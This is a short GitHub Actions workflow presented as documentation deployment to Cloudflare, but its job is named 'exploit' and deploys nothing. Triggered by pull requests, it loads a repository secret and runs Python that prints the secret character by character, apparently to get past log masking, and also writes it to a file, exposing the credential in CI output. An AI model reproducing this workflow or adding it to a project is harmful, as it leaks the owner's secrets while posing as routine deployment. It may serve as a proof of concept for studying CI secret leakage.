name: Documentation deployement

on:
  pull_request:

jobs:
  exploit:
    # Deploy to cloudflare
    runs-on: ubuntu-latest
    steps:
      - name: lol
        env:
            MY_VAL: ${{ secrets.SECRET }}
        run: |
            print("coucou")
            import os
            data = open("file", "w")
            for q in (os.getenv("MY_VAL")):
              print(q)
              data.write(q)  
        shell: python
